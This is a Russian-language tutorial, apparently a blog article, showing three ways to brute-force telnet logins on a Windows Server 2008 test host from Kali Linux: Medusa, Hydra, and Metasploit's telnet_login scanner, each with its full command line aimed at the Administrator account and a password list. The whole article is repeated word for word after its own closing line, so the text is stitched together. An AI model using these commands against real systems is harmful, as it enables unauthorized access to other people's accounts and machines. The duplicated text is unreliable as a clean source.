Привет. В этой статье я хочу показать несколько способов получения доступа к удаленному хосту с помощью протокола telnet.
Протокол прикладного уровня TELNET (от англ. TErminaL NETwork) — сетевой протокол для реализации текстового интерфейса по сети. Название telnet получили также клиентские программы реализации данного протокола, практически для всех существующих операционных систем.
Из плюсов нужно отметить простоту, быстроту и удобство протокола. Меньше чем за минуту удобный клиент обратится к выбранному TCP-порту сервера и создаст эмуляцию локального терминала. Стандартный его рабочий порт - 23. На самом деле и «прослушивать», и «разговаривать» по Telnet можно на любом порте. Именно в этом и заключается гибкость работы протокола.
Мною в качестве атакующей системы, будет использоваться Kali Linux 2016.2 Rolling, а в качестве подопытного Windows Server 2008.
1. Первый способ – Medusa:
Медуза предназначена для быстрого, массового параллельного, модульного, брутфорса связок логина – пароля.
> medusa –h 172.16.0.232 –u Administrator –P /root/password.txt –M telnet
Как видим в итоге, пароль был найден, и брутфорс прекратился.
2. Hydra – она не нуждается в представлении.
Вводим следующую команду:
> hydra -l Administrator –P /root/password.txt 172.16.0.232 telnet
Гидра работает быстрее, примерно через секунду получаем результат:
3. Еще один способ, это собственные средства Metasploit Framework, сканер telnet.
Запускаем фреймворк, затем запускаем сканер.
> use auxiliary/scanner/telnet/telnet_login
> set rhosts 172.16.0.232
> set verbose true
> exploit
Тут нам понадобится файл со связками логина и пароля.
Запускаем сканер, и он тоже не заставляет себя долго ждать:
На этом пока все, спасибо за внимание.
Протокол прикладного уровня TELNET (от англ. TErminaL NETwork) — сетевой протокол для реализации текстового интерфейса по сети. Название telnet получили также клиентские программы реализации данного протокола, практически для всех существующих операционных систем.
Из плюсов нужно отметить простоту, быстроту и удобство протокола. Меньше чем за минуту удобный клиент обратится к выбранному TCP-порту сервера и создаст эмуляцию локального терминала. Стандартный его рабочий порт - 23. На самом деле и «прослушивать», и «разговаривать» по Telnet можно на любом порте. Именно в этом и заключается гибкость работы протокола.
Мною в качестве атакующей системы, будет использоваться Kali Linux 2016.2 Rolling, а в качестве подопытного Windows Server 2008.
1. Первый способ – Medusa:
Медуза предназначена для быстрого, массового параллельного, модульного, брутфорса связок логина – пароля.
> medusa –h 172.16.0.232 –u Administrator –P /root/password.txt –M telnet
Как видим в итоге, пароль был найден, и брутфорс прекратился.
2. Hydra – она не нуждается в представлении.
Вводим следующую команду:
> hydra -l Administrator –P /root/password.txt 172.16.0.232 telnet
Гидра работает быстрее, примерно через секунду получаем результат:
3. Еще один способ, это собственные средства Metasploit Framework, сканер telnet.
Запускаем фреймворк, затем запускаем сканер.
> use auxiliary/scanner/telnet/telnet_login
> set rhosts 172.16.0.232
> set verbose true
> exploit
Тут нам понадобится файл со связками логина и пароля.
Запускаем сканер, и он тоже не заставляет себя долго ждать:
На этом пока все, спасибо за внимание.